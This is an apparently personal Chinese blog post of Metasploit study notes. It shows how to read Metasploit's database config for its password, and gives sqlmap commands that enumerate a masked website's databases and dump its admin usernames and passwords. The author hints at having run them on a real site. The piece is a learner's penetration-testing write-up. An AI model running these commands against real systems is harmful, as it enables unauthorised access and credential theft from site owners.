metasploit渗透测试学习笔记（二）

最新推荐文章于 2024-07-13 01:48:03 发布

勿语星空丶

最新推荐文章于 2024-07-13 01:48:03 发布

阅读量795

点赞数 2

分类专栏： Metasploit渗透测试学习笔记文章标签： metasploit bt5 linux

本文链接：https://blog.csdn.net/clownstar/article/details/41593119

版权

2 篇文章 0 订阅

订阅专栏

现在已经在看那本metasploit渗透测试指南了，虽然书是12年的，但还是有很多知识，当然很多疑惑，毕竟我在用的是kali。。。版本有很大改变。。好多不准！，还有就是连接数据库的问题，看了网上答案，应该先看看database.yml这个文件（我猜的，大神求教）

cat /opt/metasploit/config/database.yml

已显示密码了。

接着看看它用那个端口：

netstat -tnpl | grep postgres

而后：

db_connect msf3:4bfedc2@localhost：端口/msf3

在看看状态

db_status

ok 已连接

呵呵~~~~~

后来又跟着大神xiao136xx（网易博客）传送门大神的大神，学了点sqlmap，的确长知识了不少,如下：

sqlmap --url http：//www.xxxx.asp?id=xx --dbs

--url 目标url。

--dbs 枚举数据库。

然后枚举表。

表名已出来。

然后枚举数据库表列：

看username，password已出来，所以现在正式开始猜解：

--dump转储，也就是下载的意思吧。

为什么

<span style="background-color: rgb(255, 102, 102);">resumed：dba902f69c09ceb8

resumed：jx_lc_ztxx
</span>

呢？

因为我之前测试过了-。-！

<pre class="html" name="code">sqlmap --url http：//www.xxxx.asp?id=xx -D 数据库 -T admin -C ”password，username“ --dump

OK了

上面就是登录名和密码了，别问我解密不出来，我特么也没办法。。。呵呵。

</pre><pre class="html" name="code">好吧，还有为什么背景图不一样呢，那是因为前一个在backtrack5下面测试，另一个在kali啦。。。。

我好无聊额（我知道没人看的zzz）。

好累，最近一直在测试学习metasploit，但我好厌恶我总是没什么进步，一天都呆在实验室，一天都在测试，没什么效果啊，我要崩溃了。

旁边小伙伴问我，你最孤独的时候是什么？

呵呵，我早已习惯了。。。。。。。。。。。--！ ：）

雄关漫道真如铁，万水千山不等闲啊！

不说了，我去泡杯奶茶压压惊。：）

关注